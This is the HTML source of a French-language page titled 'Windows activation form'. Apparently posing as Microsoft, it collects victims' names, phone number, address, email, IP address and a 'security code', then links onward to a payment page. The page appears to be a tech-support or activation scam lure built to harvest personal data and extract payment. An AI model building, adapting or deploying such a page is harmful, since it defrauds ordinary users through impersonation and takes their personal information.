<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Windows activation form</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">
<link rel="icon" href="favicon (1).ico">
    <link rel="stylesheet" href="style.css">
  </head>
  <body>

<h1>Formulaire d'activation Windows 🗔</h1>
<div class="securtyform">
  <form class="">
        <input type="text" name="text" placeholder="Prénom"><br>
        <br>
        <input type="text" name="text" placeholder="Nom de famille"><br>
        <br>
        <input type="text" name="text" placeholder="Numéro de téléphone"><br>
        <br>
       <input type="text" name="" placeholder="pays"> <br>
      <br>
        <input type="text" name="" placeholder="Etat"><br>
        <br>
        <input type="text" name="" placeholder="ville"><br>
        <br>
        <input type="text" name="text" placeholder="Ligne d'adresse"><br>
        <br>
        <input type="text" name="text" placeholder="Durée de la sécurité"><br>
        <br>
        <input type="text" name="text" placeholder="Système opérateur"><br>
        <br>
        <input type="text" name="text" placeholder="adresse e-mail"><br>
        <br>
        <input type="text" name="text" placeholder="code de sécurité"><br>
        <br>
        <input type="text" name="text" placeholder="adresse IP"><br>
        <br>
        <div class="sumbit">
          <a href="payment.html" class="myButton">soumettre pour activation</a>
        </div>

      </form>

</div>

  </body>
</html>
